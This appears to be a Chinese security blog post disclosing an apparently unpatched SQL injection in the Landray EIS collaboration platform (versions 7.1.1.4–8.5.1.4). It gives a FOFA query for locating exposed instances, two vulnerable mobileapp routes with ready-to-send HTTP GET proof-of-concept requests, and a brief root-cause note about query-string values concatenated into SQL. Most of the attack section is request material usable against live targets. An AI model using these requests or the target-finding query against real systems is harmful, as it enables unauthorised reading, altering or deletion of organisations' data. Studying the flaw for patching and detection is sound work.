【未公开漏洞】蓝凌EIS存在多处SQL注入

漏洞描述

蓝凌EIS智慧协助平台存在多处SQL注入。

蓝凌eis智慧协同平台是由深圳市微达软件有限公司开发的用于企业在知识,协同,项目管理等场景的OA系统。

影响版本

7.1.1.4—8.5.1.4

fofa语法

app="Landray-EIS智慧协同平台"

漏洞复现

路由1:

http://127.0.0.1:80/mobileapp/address/mobileposition.aspx?search=*

POC:


GET mobileapp/address/mobileposition.aspx?search=* HTTP/1.1
Host: 127.0.0.1:80
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
【未公开漏洞】蓝凌EIS存在多处SQL注入

路由2:
http://127.0.0.1:80/mobileapp/Task/task_view.aspx?id=%27=


GET mobileapp/Task/task_view.aspx?id=%27= HTTP/1.1
Host: 127.0.0.1:80
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
【未公开漏洞】蓝凌EIS存在多处SQL注入

漏洞分析

漏洞点1:

SQL注入的风险主要集中在直接将用户输入(通过Request.QueryString获取)拼接到SQL查询语句中,没有进行预处理或使用参数化查询。

【未公开漏洞】蓝凌EIS存在多处SQL注入

漏洞点2:

在于从Request.QueryString[“id”]直接获取的id值被用于构建SQL查询语句而未进行任何过滤或参数化处理这意味着,如果攻击者通过修改URL中的id参数值为恶意的SQL代码片段,他们可能能够执行未授权的数据库操作,如访问、修改或删除数据。

【未公开漏洞】蓝凌EIS存在多处SQL注入
© 版权声明
THE END
喜欢就支持一下吧
点赞11 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容